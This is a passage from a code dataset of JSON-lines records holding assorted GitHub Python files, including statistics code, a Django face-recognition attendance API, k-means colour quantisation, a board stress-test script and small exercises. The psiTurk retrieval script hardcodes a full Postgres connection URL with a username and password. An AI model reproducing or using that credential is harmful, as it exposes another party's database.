arrays\nnp_bfuncs = {'subtract': np.subtract,\n 'add': np.add}\n# unary functions: work on a single array\nnp_ufuncs = {'abs': np.abs,\n 'negative': np.negative}\n\n\nclass TContrastSpec:\n \"Parse a contrast expression and expose methods to apply it\"\n\n def __init__(self, contrast, cells, indexes):\n \"\"\"Parse a contrast expression and expose methods to apply it\n\n Parameters\n ----------\n contrast : str\n Contrast specification.\n cells : tuple of cells\n Cells that occur in the contrast (each cell is represented by a str\n or a tuple of str).\n indexes : dict {cell: index}\n Indexes for the data of every cell.\n \"\"\"\n ast = parse(contrast)\n n_buffers, cells_in_contrast = _t_contrast_rel_properties(ast)\n pcells, mcells = _t_contrast_rel_expand_cells(cells_in_contrast, cells)\n\n self.contrast = contrast\n self.indexes = indexes\n self._ast = ast\n self._pcells = pcells\n self._mcells = mcells\n self._n_buffers = n_buffers\n\n # data buffers\n self._buffer_shape = None\n self._buffer = None\n self._y_perm = None\n\n def map(self, y):\n \"Apply contrast without retainig data buffers\"\n buff = np.empty((self._n_buffers,) + y.shape[1:])\n data = _t_contrast_rel_data(y, self.indexes, self._pcells, self._mcells)\n tmap = _t_contrast_rel(self._ast, data, buff)\n return tmap\n\n def __call__(self, y, out, perm):\n \"Apply contrast to permutation of the data, storing and recycling data buffers\"\n buffer_shape = (self._n_buffers,) + y.shape[1:]\n if self._buffer_shape != buffer_shape:\n self._buffer = np.empty(buffer_shape)\n self._y_perm = np.empty_like(y)\n self._buffer_shape = buffer_shape\n self._y_perm[perm] = y\n data = _t_contrast_rel_data(self._y_perm, self.indexes, self._pcells, self._mcells)\n tmap = _t_contrast_rel(self._ast, data, self._buffer, out)\n return tmap\n\n\ndef _t_contrast_rel_properties(item):\n \"\"\"Find properties of a compiled t-contrast\n\n Parameters\n ----------\n item : tuple\n Contrast specification.\n\n Returns\n -------\n n_buffers : int\n Number of buffer maps needed.\n cells : set\n names of all cells that occur in the contrast.\n \"\"\"\n if item[0] == 'ufunc':\n needed_buffers, cells = _t_contrast_rel_properties(item[2])\n return needed_buffers + 1, cells\n elif item[0] in ('bfunc', 'afunc'):\n _, _, items_ = item\n local_buffers = len(items_)\n cells = set()\n for i, item_ in enumerate(items_):\n available_buffers = local_buffers - i - 1\n needed_buffers, cells_ = _t_contrast_rel_properties(item_)\n additional_buffers = needed_buffers - available_buffers\n if additional_buffers > 0:\n local_buffers += additional_buffers\n cells.update(cells_)\n return local_buffers, cells\n else:\n return 0, set(item[1:])\n\n\ndef _t_contrast_rel_expand_cells(cells, all_cells):\n \"\"\"Find cells that are an average of other cells\n\n Parameters\n ----------\n cells : set\n Cells occurring in the contrast.\n all_cells : tuple\n All cells in the data.\n\n Returns\n -------\n primary_cells : set\n All cells that occur directly in the data.\n mean_cells : dict\n ``{name: components}`` dictionary (components being a tuple with all\n cells to be averaged).\n \"\"\"\n # check all cells have same number of components\n ns = set(1 if isinstance(cell, str) else len(cell) for cell in all_cells)\n ns.update(1 if isinstance(cell, str) else len(cell) for cell in cells)\n if len(ns) > 1:\n msg = (\"Not all cells have the same number of components: %s\" %\n str(tuple(cells) + tuple(all_cells)))\n raise ValueError(msg)\n\n # convert cells to str for fnmatch\n all_cellnames = tuple(cellname(cell, '|') for cell in all_cells)\n\n primary_cells = set()\n mean_cells = {}\n for cell in cells:\n if cell in all_cells:\n primary_cells.add(cell)\n else:\n r = re.compile(fnmatch.translate(cellname(cell, '|')))\n base = tuple(c for c, cn in zip(all_cells, all_cellnames) if r.match(cn))\n if len(base) == 0:\n raise ValueError(\"%r does not match any cells in data %r\" %\n (cellname(cell, '|'), ', '.join(all_cellnames)))\n mean_cells[cell] = base\n primary_cells.update(base)\n\n return primary_cells, mean_cells\n\n\ndef _t_contrast_rel_data(y, indexes, cells, mean_cells):\n \"Create {cell: data} dictionary\"\n data = {cell: y[indexes[cell]] for cell in cells}\n for name, cells_ in mean_cells.items():\n cell = cells_[0]\n x = data[cell].copy()\n for cell in cells_[1:]:\n x += data[cell]\n x /= len(cells_)\n data[name] = x\n\n return data\n\n\ndef _t_contrast_rel(item, data, buff, out=None):\n \"Execute a t_contrast (recursive)\"\n if item[0] == 'ufunc':\n _, func, item_ = item\n tmap = _t_contrast_rel(item_, data, buff[1:], buff[0])\n tmap = func(tmap, out)\n elif item[0] == 'bfunc':\n _, func, items = item\n tmap1 = _t_contrast_rel(items[0], data, buff[2:], buff[1])\n tmap2 = _t_contrast_rel(items[1], data, buff[2:], buff[0])\n tmap = func(tmap1, tmap2, out)\n elif item[0] == 'afunc':\n _, func, items_ = item\n tmaps = buff[:len(items_)]\n for i, item_ in enumerate(items_):\n _t_contrast_rel(item_, data, buff[i + 1:], tmaps[i])\n tmap = func(tmaps, axis=0, out=out)\n else:\n _, c1, c0 = item\n tmap = stats.t_1samp(data[c1] - data[c0], out)\n\n return tmap\n","repo_name":"christianbrodbeck/Eelbrain","sub_path":"eelbrain/_stats/t_contrast.py","file_name":"t_contrast.py","file_ext":"py","file_size_in_byte":6249,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"72"} +{"seq_id":"2326628638","text":"import random\n\nt = 100\nprint(t)\nfor _ in range(t):\n d = []\n n = random.randint(100, 1000)\n for i in range(n):\n d.append(random.randint(4, 1000000))\n print(n)\n print(\" \".join([str(i) for i in d]))","repo_name":"lebahoang/cp","sub_path":"gcj/2022/qualification/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41302595372","text":"\n\n\n### 예전에 푼 풀이\n\nN = int(input())\nli_a = list(map(int, input().split(\" \")))\nli_b = list(map(int, input().split(\" \")))\n\nsum = 0\nfor k in range(N) :\n max, min = 0, 100\n\n for i in range(len(li_a)) :\n if li_a[i] > max :\n max = li_a[i]\n A = max\n li_a.remove(max)\n\n for i in range(len(li_b)) :\n if li_b[i] < min :\n min = li_b[i]\n B = min\n li_b.remove(min)\n sum += A*B\n \nprint(sum)\n","repo_name":"h-dragon93/Algorithm_with_Python","sub_path":"Baekjoon_1026.py","file_name":"Baekjoon_1026.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10227841899","text":"import datetime\nimport json\nfrom django.shortcuts import render\nfrom django.conf import settings\nfrom google.oauth2 import id_token\nfrom google.auth.transport import requests\nfrom rest_framework import views, viewsets, mixins\nfrom rest_framework.parsers import FileUploadParser\nfrom core.serializers import *\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.exceptions import ValidationError\nfrom django.core import validators\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.db.models import Q\nfrom rest_framework.decorators import detail_route\n\nimport face_recognition\n\n\n# Create your views here.\nclass GoogleLoginView(views.APIView):\n\n def post(self, request, format=None):\n try:\n idinfo = id_token.verify_oauth2_token(token, requests.Request(), settings.CLIENT_ID)\n if idinfo['iss'] not in ['accounts.google.com', 'https://accounts.google.com']:\n raise ValueError('Wrong issuer.')\n userid = idinfo['sub']\n except ValueError:\n pass\n\n\nclass UserViewSet(mixins.RetrieveModelMixin,\n mixins.UpdateModelMixin,\n mixins.CreateModelMixin,\n mixins.ListModelMixin,\n viewsets.GenericViewSet,):\n \"\"\"\n Доступ к текущему пользователю: `/users/me/` \\n\n Получить токен: `/auth-token/`, username = `email`, password = `password` \\n\n Авторизация по токену: `curl -X GET http://127.0.0.1:8000/api/example/ -H 'Authorization: Token 9944b09199c62bcf9418ad846dd0e4bbdfc6ee4b'`\n \"\"\"\n\n serializer_class = UserSerializer\n queryset = User.objects.none()\n\n def dispatch(self, request, *args, **kwargs):\n self.perform_authentication(self.initialize_request(request, *args, **kwargs))\n if kwargs.get('pk') == 'me' and request.user:\n kwargs['pk'] = request.user.pk\n return super(UserViewSet, self).dispatch(request, *args, **kwargs)\n\n def create(self, request, *args, **kwargs):\n try:\n validators.validate_email(request.data['email'])\n except:\n raise ValidationError({\"email\": _('Enter a valid email address.')})\n if User.objects.filter(email=request.data['email']).count() > 0:\n raise ValidationError({\"email\": _('Email is already registered')})\n if not request.data.get('password', None):\n raise ValidationError({\"password\": _('Password must be present')})\n if len(request.data['password']) < 6:\n raise ValidationError({\"password\": _('Password is too short')})\n if not request.data.get('first_name', None):\n raise ValidationError({\"first_name\": _('Name must be present')})\n user = User.objects.create_user(\n request.data['username'],\n request.data['email'],\n request.data['password'],\n first_name=request.data.get('first_name',\"\"),\n last_name=request.data.get('first_name',\"\"),\n status=request.data.get(\"status\"),\n photo=request.data.get(\"photo\")\n )\n serializer = self.get_serializer(user)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n def update(self, request, *args, **kwargs):\n if kwargs.get('pk') == request.user.pk:\n user = User.objects.get(pk=request.user.pk)\n if request.data['status'] not in ('work in office', 'not working'):\n user.status = request.data['status']\n user.comment = request.data['comment']\n user.save()\n Entry.objects.create(user=user,type=request.data['status']).save()\n serializer = self.get_serializer(user)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response([_('Wrong credentials')], status=status.HTTP_400_BAD_REQUEST)\n\n def get_queryset(self):\n q = self.request.GET.get('q')\n if q:\n return User.objects.filter(Q(first_name__icontains=q) | Q(last_name__icontains=q))\n else:\n return User.objects.all()\n\n @detail_route(methods=['get'])\n def entries(self, request, pk=None):\n user = self.get_object()\n entries = user.entry_set\n dt_start = request.GET.get('start')\n if dt_start:\n entries = entries.filter(datetimestamp__gte=dt_start)\n dt_end = request.GET.get('end')\n if dt_end:\n entries = entries.filter(datetimestamp__lte=dt_end)\n return Response(EntrySerializer(entries, many=True).data, status=status.HTTP_200_OK)\n \n\nclass EntryViewSet(viewsets.ModelViewSet):\n \"\"\"\n Example:\n\n `curl -H \"Authorization: Token 512e3026a7c11dc6cc52027a6c1677b012f0dfae\" -H \"Content-Disposition: attachment; filename=андрюха.png\" --data-binary @\"../Downloads/андрюха.png\" https://absolute.cloud.technokratos.com/api/entries/`\n \"\"\"\n queryset = Entry.objects.all()\n serializer_class = EntrySerializer\n parser_classes = (FileUploadParser,)\n\n def create(self, request, *args, **kwargs):\n # request.data._mutable = True\n request.data['photo'] = request.data['file']\n today_min = datetime.datetime.combine(datetime.date.today(), datetime.time.min)\n\n entry = Entry.objects.create(user=None, type=None, photo=request.data['photo'])\n\n unknown_image = face_recognition.load_image_file(request.data['file'])\n unknown_encoding = face_recognition.face_encodings(unknown_image)[0]\n\n for user in User.objects.all():\n if user.photo:\n known_image = face_recognition.load_image_file(user.photo)\n known_encoding = face_recognition.face_encodings(known_image)[0]\n results = face_recognition.compare_faces([known_encoding], unknown_encoding)\n print(results)\n if results[0]:\n entry.user = user\n print(entry.user)\n if not Entry.objects.filter(user=user):\n entry.type = 'enter'\n user.status = 'work in office'\n elif Entry.objects.filter(user=user, type='enter', datetimestamp__gte=today_min):\n entry.type = 'exit'\n user.status = 'not working'\n else:\n entry.type = 'enter'\n user.status = 'work in office'\n entry.save()\n user.save()\n break\n return Response(EntrySerializer(entry).data)\n\n\nclass ProjectViewSet(viewsets.ModelViewSet):\n queryset = Project.objects.all()\n serializer_class = ProjectSerializer\n","repo_name":"blinovandrey/hackaton_face_recognition","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22540262328","text":"from math import factorial\n\nsum = 0\nfor cnt in range(1, 100000):\n a = list(str(cnt))\n sum_ = 0\n for n in a:\n sum_ += factorial(int(n))\n if sum_ == cnt:\n sum += cnt\n\nprint(sum - factorial(2) - factorial(1))\n","repo_name":"melank/ProjectEuler","sub_path":"py/problem34.py","file_name":"problem34.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40979558655","text":"import datetime\n\ndef encrypt(text, height):\n result = \"\"\n for i in range(height):\n for j in range(i, len(text), height):\n result += text[j]\n return result\n\ndef decrypt(text, height):\n result = \"\"\n width = int(len(text) / height)\n for i in range(width):\n for j in range(height):\n index = i + j * width\n if index < len(text):\n result += text[index]\n return result\n\ntext = input(\"Введіть текст: \")\nheight = int(input(\"Введіть висоту частоколу (секретний ключ): \"))\nencrypted_text = encrypt(text, height)\nprint(\"Зашифрований текст: \", encrypted_text)\ndecrypted_text = decrypt(encrypted_text, height)\nprint(\"Розшифрований текст: \", decrypted_text)\n\n\ndef printTimeStamp(name):\n print('Автор програми: ' + name)\n print('Час компіляції: ' + str(datetime.datetime.now()))\n\n\nprintTimeStamp(\"Yan Savinov\")\n","repo_name":"YanSav10/CSBC","sub_path":"practice-7/task-2.py","file_name":"task-2.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19156180635","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import pairwise_distances_argmin\nfrom sklearn.datasets import load_sample_image\nfrom sklearn.utils import shuffle\n\nfrom PIL import Image\nimg = Image.open(\"C:\\\\Users\\\\Sci_Dell_Cpu\\\\Desktop\\\\aaa.webp\")\nchina = np.asarray(img)\n\nn_clusters = 64\nchina = np.array(china,dtype=np.float64) / china.max()\nw,h,d = original_shape = tuple(china.shape)\nassert d == 3\nimage_array = np.reshape(china,(w*h,d))\n\nkmeans = KMeans(n_clusters=n_clusters,random_state=0).fit(image_array)\n\nlabels = kmeans.predict(image_array)\n\nimage_kmeans = image_array.copy()\nfor i in range(w*h):\n image_kmeans[i] = kmeans.cluster_centers_[labels[i]]\n\nimport pandas as pd\npd.DataFrame(image_kmeans).drop_duplicates().shape\n\nimage_kmeans = image_kmeans.reshape(w,h,d)\n\ncentroid_random = shuffle(image_array,random_state=0)[:n_clusters]\nlabels_random = pairwise_distances_argmin(centroid_random,image_array,axis=0)\nimage_random = image_array.copy()\nfor i in range(w*h):\n image_random[i] = centroid_random[labels_random[i]]\nimage_random = image_random.reshape(w,h,d)\n\npic=plt.subplot(2,3,1)\npic.imshow(china)\npic=plt.subplot(2,2,2)\npic.imshow(image_kmeans)\npic=plt.subplot(2,2,3)\npic.imshow(image_random)","repo_name":"GuoJia563/sklearn0","sub_path":"kmeans_VQ_mypic.py","file_name":"kmeans_VQ_mypic.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7540499708","text":"import tkinter as tk\nfrom tkinter import messagebox as mgb\nfrom tkinter.messagebox import *\nfrom tkinter import colorchooser\nfrom tkinter import filedialog\n\n\ndef test_messagebox(master=None):\n mgb.showinfo(title=\"InfoWindow\", message='What the fuck')\n mgb.showwarning(\"Spam\", \"Egg Warning\")\n mgb.showerror(\"Spam\", \"Egg Alert\")\n # print(\"info\", showinfo(\"Spam\", \"Egg Information\"))\n # print(\"warning\", showwarning(\"Spam\", \"Egg Warning\"))\n # print(\"error\", showerror(\"Spam\", \"Egg Alert\"))\n # print(\"question\", askquestion(\"Spam\", \"Question?\"))\n # print(\"proceed\", askokcancel(\"Spam\", \"Proceed?\"))\n # print(\"yes/no\", askyesno(\"Spam\", \"Got it?\"))\n print(\"yes/no/cancel\", askyesnocancel(\"Spam\", \"Want it?\"))\n print(\"try again\", askretrycancel(\"Spam\", \"Try again?\"))\n\n\ndef test_filedialog(master=None):\n def callback():\n print(\"fileName: \", filedialog.askopenfilename())\n\n tk.Button(master, text=\"打开文件\", command=callback).pack()\n\n\ndef test_colorchooser(master=None):\n def callback():\n print(\"color:\", colorchooser.askcolor())\n\n tk.Button(master, text=\"选择颜色\", command=callback).pack()\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n root.title(\"3 Standard Dialog\")\n height, width = 300, 300\n root.geometry(\"%dx%d+%d+%d\" % (width, height,\n (root.winfo_screenwidth() - width) // 2,\n (root.winfo_screenheight()- height) // 2))\n # test_messagebox(root)\n # test_colorchooser(root)\n test_filedialog(root)\n\n root.mainloop()\n\n","repo_name":"ZhenZHAO/GUI-Tkinter","sub_path":"20_std_dialog.py","file_name":"20_std_dialog.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2391352730","text":"# Create a function that accepts two parameters, namely;\n# 1. A list of type string\n# 2. A name\n# The function should then check if a word is in that list. (Let the word exist e.g THIKA [Busia, Thika, Nakuru, Nyeri])\n# Return that word in reverse order if found.\n#If the word is not found, append the word and return the list.\n\ncounties = [\"Nairobi\",\"Mombasa\",\"Thika\",\"Nakuru\",\"Turkana\",\"Garissa\",\"Lamu\",\"Nandi\",\"Bungoma\"]\ncounty = \"Bungoma\"\n\ndef checker(a,b):\n if a not in b:\n b.append(a)\n printlist(b)\n return b\n else:\n y = a[::-1]\n print(y)\n return y\n\n\n\ndef printlist(thelist):\n for i in thelist:\n print (i)\nk=0\nwhile k !=1:\n checker(county,counties)\n k = int(input(\"To continue, press 0, To exit press 1:\\t\"))\n#print (checker(county,counties))\n","repo_name":"KOdunga/Python_Introduction","sub_path":"PycharmProjects/untitled1/assign2.py","file_name":"assign2.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14942139437","text":"from sqlalchemy import create_engine, MetaData, Table\r\nimport json\r\nimport pandas as pd\r\n\r\ndb_url = \"postgres://nfhbnzfykqrsgq:481860bcda89b87b1c373f024d84c81b41e5ec7c06e8410866f7605984b5789e@ec2-35-175-155-248.compute-1.amazonaws.com:5432/d4mi4q3a82eu6k\"\r\ntable_name = 'realdata'\r\ndata_column_name = 'datastring'\r\n# boilerplace sqlalchemy setup\r\nengine = create_engine(db_url)\r\nmetadata = MetaData()\r\nmetadata.bind = engine\r\ntable = Table(table_name, metadata, autoload=True)\r\n# make a query and loop through\r\ns = table.select()\r\nrows = s.execute()\r\n\r\ndata = []\r\n#status codes of subjects who completed experiment\r\n#statuses = [3,4,5,7]\r\n# if you have workers you wish to exclude, add them here\r\nexclude = []\r\nfor row in rows:\r\n # only use subjects who completed experiment and aren't excluded\r\n \r\n data.append(row[data_column_name])\r\n\r\n# Now we have all participant datastrings in a list.\r\n# Let's make it a bit easier to work with:\r\n\r\n# parse each participant's datastring as json object\r\n# and take the 'data' sub-object\r\ndata = [json.loads(part)['data'] for part in data]\r\n\r\n# insert uniqueid field into trialdata in case it wasn't added\r\n# in experiment:\r\nfor part in data:\r\n for record in part:\r\n record['trialdata']['uniqueid'] = record['uniqueid']\r\n\r\n# flatten nested list so we just have a list of the trialdata recorded\r\n# each time psiturk.recordTrialData(trialdata) was called.\r\ndata = [record['trialdata'] for part in data for record in part]\r\n\r\n# Put all subjects' trial data into a dataframe object from the\r\n# 'pandas' python library: one option among many for analysis\r\ndata_frame = pd.DataFrame(data)\r\ndata_frame.to_csv('alldataindatabase.csv',index=False)","repo_name":"ShanJG/active_removal_serial_dependence","sub_path":"registered report/task/retrieve.py","file_name":"retrieve.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33048171663","text":"import functools\n\n\nclass Participant:\n \n def __init__(self, name, email, exclude):\n self.name = name\n self.email = email\n \n if exclude:\n self.exclude = exclude\n else:\n self.exclude = []\n \n self.giftee = None\n\n # The possible giftees. Will be populated in main.py\n self.domain = []\n \n\n @property\n def nameWithMatch(self):\n stringOut = self.name\n if self.giftee:\n stringOut += \" buys for {}\".format(self.giftee.name)\n else:\n stringOut += \" (no match)\"\n return stringOut\n\n '''\n Removes the current object from its own domain\n '''\n def removeSelf(self):\n for i, part in enumerate(self.domain):\n if part == self:\n self.domain.pop(i)\n return\n\n '''\n Updates the domain to exclude objects in the exclude list.\n '''\n def cullDomain(self):\n for i, part in enumerate(self.domain):\n if part in self.exclude:\n self.domain.pop(i)\n\n '''\n Converts the list of names in self.exclude to a list of Participant objects\n '''\n def convertExcludeToObjects(self, participants):\n if not self.exclude:\n pass\n else:\n for i in range(len(self.exclude)):\n nameString = self.exclude[i].strip().lower()\n \n for part in participants:\n objectName = part.name.strip().lower()\n if objectName == nameString:\n self.exclude[i] = part\n break\n\n \n\n\n def __str__(self):\n returnString = \"Name: {}\\nemail: {}\\nExclude:\\n\".format(self.name, self.email)\n if len(self.exclude) == 0:\n returnString += \"\\tNone\"\n elif self.exclude:\n for item in self.exclude:\n if isinstance(item, str):\n returnString += \"\\t\" + item + \"\\n\"\n else:\n returnString += \"\\t\" + item.name + \"\\n\"\n else:\n returnString += \"None\\n\"\n return returnString\n\n\n '''\n The following methods allow objects to be sorted by the number of exceptions.\n '''\n def __lt__(self, other):\n return len(self.exclude) < len(other.exclude)\n\n def __gt__(self, other):\n return len(self.exclude) > len(other.exclude)\n \n def __eq__(self, other):\n return len(self.exclude) == len(other.exclude)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n \n def __le__(self, other):\n return self.__eq__(other) or self.__lt__(other)\n \n def __ge__(self, other):\n return self.__eq__(other) or self.__gt__(other)\n","repo_name":"enanram/SecretSanta","sub_path":"participant.py","file_name":"participant.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18226220650","text":"# Print welcome message.\nprint(\"Welcome to the tip calculator!\")\n# Request bill data.\ntotal_bill = float(input(\"What was the total bill? $\"))\npercent_tip = int(input(\"How much tip would you like to give? 10, 12, or 15?\"))\npeople = int(input(\"How many people to split the bill? \"))\n# Calculate tip and total bill\ntip = (percent_tip + 100) / 100\nnew_bill = total_bill * tip\n# Split bill per person\nunit_bill = new_bill / people\n# Round the result to 2 decimal places.\nnew_unit_bill = round(unit_bill, 2)\n# Print result\nprint(f\"Each person should pay: ${new_unit_bill}\")\n","repo_name":"Manuel-7tin/Python-course-projects","sub_path":"2_tip-calculator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16221180814","text":"import json\nimport tweepy\nfrom tweepy import OAuthHandler\n\n\n\nCONSUMER_KEY = secrets[\"CONSUMER_KEY\"]\nCONSUMER_SECRET = secrets[\"CONSUMER_SECRET\"]\nOAUTH_TOKEN = secrets[\"OAUTH_TOKEN\"]\nOAUTH_TOKEN_SECRET = secrets[\"OAUTH_TOKEN_SECRET\"]\n\nauth = OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(OAUTH_TOKEN, OAUTH_TOKEN_SECRET)\n\napi = tweepy.API(auth)\n\nDUB_WOE_ID = 560743\nLON_WOE_ID = 44418\nCHICAGO_ID = 2379574\n\n# http://docs.tweepy.org/en/latest/api.html?highlight=trends_place#API.trends_place\ndub_trends = api.trends_place(DUB_WOE_ID)\nlon_trends = api.trends_place(LON_WOE_ID)\nchi_trends = api.trends_place(CHICAGO_ID)\n\n# for trend in json.dumps(dub_trends)[0]['trends']:\n# print(trend)\n\n# print json.dumps(dub_trends, indent=1)\n# print json.dumps(lon_trends, indent=1)\n# print json.dumps(chi_trends, indent=1)\n\ndub_trends_set = set([trend['name']\n for trend in dub_trends[0]['trends']])\n\nlon_trends_set = set([trend['name']\n for trend in lon_trends[0]['trends']])\n\nchi_trends_set = set([trend['name']\n for trend in chi_trends[0]['trends']])\n\ncommon_trends = set.intersection(dub_trends_set, chi_trends_set)\n\nprint(common_trends)\n","repo_name":"QsBBQ/mytweet","sub_path":"twitter_intro.py","file_name":"twitter_intro.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27698617180","text":"#!/usr/bin/python3\n\nimport os\nimport time\nimport subprocess\nfrom decimal import Decimal\nfrom multiprocessing import Process\n\ntop_dir = os.path.dirname(os.path.abspath(__file__))\n\n# 0xFFA50800\tPS System Monitor\n# 0xFFA50C00\tPL System Monitor\n# subprocess.run(\"ls -al\", shell=True)\n\ndef get_temperature(address):\n datafile = os.popen(\"devmem %s\" % address)\n rawdata = int(datafile.readline().strip(),16)\n result = \"%.2f\" %(Decimal(rawdata) * Decimal(509.3140064) / Decimal(65535) - Decimal(280.23087870))\n return result\n\ndef get_cpustatus():\n datafile = os.popen(\"top -b -n 1 | grep 'Cpu(s):'\")\n result = datafile.readline().strip()\n return result\n\ndef get_time():\n datafile = os.popen(\"date +%F' '%T' '%z\")\n result = datafile.readline().strip()\n return result\n\ndef get_log():\n result = \"%s %s PS temperature: %s C. PL temperature: %s C.\" %(get_time(),get_cpustatus(),get_temperature(address = \"0xFFA50800\"),get_temperature(address = \"0xFFA50C00\"))\n return result\n\ndef function_log(logfile, during):\n while True:\n print(\"==== Process log <%s> is running ====\" %os.getpid())\n writefile = open(\"%s/%s\"%(top_dir,logfile),\"a\")\n logdata = \"%s\" %get_log()\n print(logdata)\n writefile.write(\"%s\\n\" %logdata)\n writefile.close()\n time.sleep(during)\n\ndef function_build(builddir):\n while True:\n print(\"==== Process build <%s> is running ====\" %os.getpid())\n build_dir = \"%s/%s\" %(top_dir,builddir)\n subprocess.run(\"mkdir -p %s\" %build_dir, shell=True )\n os.chdir(\"%s\" %build_dir)\n subprocess.run(\"rm -rf *\" , shell=True)\n subprocess.run(\"cmake /home/root/workspace/PaddleLiteSample/classification\" , shell=True)\n subprocess.run(\"make\", shell=True )\n os.chdir(\"%s\" %top_dir)\n\ndef function_ai(builddir):\n print(\"==== Process AI <%s> is running ====\" %os.getpid())\n build_dir = \"/home/root/workspace/PaddleLiteSample/classification/%s\" %builddir\n subprocess.run(\"mkdir -p %s\" %build_dir, shell=True )\n os.chdir(\"%s\" %build_dir)\n subprocess.run(\"rm -rf *\" , shell=True)\n subprocess.run(\"cmake /home/root/workspace/PaddleLiteSample/classification\" , shell=True)\n subprocess.run(\"make\", shell=True )\n while True:\n print(\"==== Process AI <%s> is running ====\" %os.getpid())\n subprocess.run(\"./image_classify ../configs/resnet50/drink.json\" , shell=True)\n os.chdir(\"%s\" %top_dir)\n\ndef program_stress_test(idle_time, stress_time, idle2_time, logfile, during, processes, builddir):\n file_log = \"%s/%s\"%(top_dir,logfile)\n writefile = open(\"%s\"%file_log,\"a\")\n writefile.write(\"==============================================================================================================================================================\\n\")\n writefile.write(\"idle: %s S. stree: %s S. idle2: %s S. logfile: %s/%s. processes: %s.\\n\" %(idle_time, stress_time, idle2_time, top_dir, logfile, processes))\n writefile.write(\"==============================================================================================================================================================\\n\")\n writefile.close()\n process_log = Process(target = function_log, args =(logfile, during, ), name = \"worker_log\" )\n process_log.start()\n time.sleep(idle_time)\n record = []\n for i in range(processes):\n if ( i == 0 ):\n process_work = Process(target = function_ai, args =(\"build\",), name = \"worker_ai\" )\n else:\n process_work = Process(target = function_build, args =(\"%s_%s\"%(builddir,i),), name = \"worker_%s\"%i )\n process_work.start()\n record.append(process_work)\n time.sleep(stress_time)\n for process_work in record:\n process_work.terminate()\n for process_work in record:\n process_work.join()\n time.sleep(idle2_time)\n process_log.terminate()\n process_log.join()\n for i in range(processes):\n subprocess.run(\"rm -rf %s/%s_%s \" %(top_dir,builddir,i ) , shell=True)\n record.clear()\n \nif __name__ == '__main__':\n program_stress_test(idle_time = 1800, stress_time= 3600, idle2_time = 1800, logfile = \"stress.log\", during = 5, processes = 6, builddir = \"worker\")\n\n\n\n\n","repo_name":"robe-zhang/edgeboard_fz5c_stress_test","sub_path":"stress.py","file_name":"stress.py","file_ext":"py","file_size_in_byte":4254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35472827554","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n!+ 去他奶奶的dbghelp.SymXXX(),既然系统是固定的,咱自己解析sym!\n文件格式:\nkernel32.dll.txt:\n 0000AA5C 0000AA8D lstrcmpW\n 00061B7D 00061BAD GetProcessId\n ...\nntdll.dll.txt\n 0006FBD2 0006FBDF _tolower\n ...\n\"\"\"\n\nimport os\nimport inspect\n\n\nfile_path = os.path.abspath(inspect.getsourcefile(lambda: 0))\nfile_dir = os.path.dirname(inspect.getsourcefile(lambda: 0))\n\n\n# ---------------------------------------------------------------------------\n\ndef _pt_log(line):\n \"\"\"\n proxy to log.pt_log()\n \"\"\"\n log.pt_log(line)\n\n\n# ---------------------------------------------------------------------------\n# self-parsed symbol\n\n#\n# structure of v_tmp_symbols:\n# {\"kernel32.dll\": [(0x0000AA5C, 0x0000AA8D, lstrcmpW),\n# (0x00061B7D, 0x00061BAD, GetProcessId),\n# ...],\n# \"ntdll.dll\": [(0x0006FBD2, 0x0006FBDF, _tolower),\n# ...]}\n#\nglobal v_tmp_symbols\nv_tmp_symbols = {}\n\n\ndef _syms_load(sym_name, file_path):\n \"\"\"\n load self-parsed symbol from specified file path\n\n @param: sym_name : string : module name of symbols\n @param: file_path : string : symbol file path\n \"\"\"\n assert os.path.exists(file_path)\n\n global v_tmp_symbols\n assert sym_name not in v_tmp_symbols\n v_tmp_symbols[sym_name] = []\n\n try:\n f = open(file_path)\n except:\n _pt_log(\">>> open sym file error: %s\" % sym_name)\n else:\n for line in f:\n\n assert line.count(\" \") == 2\n splits = line.split(\" \")\n assert len(splits) == 3\n # offset format: HEX\n func_item = (int(splits[0], 16), int(splits[1], 16), splits[2].strip(\"\\n\"))\n\n v_tmp_symbols[sym_name].append(func_item)\n f.close()\n\n\ndef load_sysdll_syms():\n 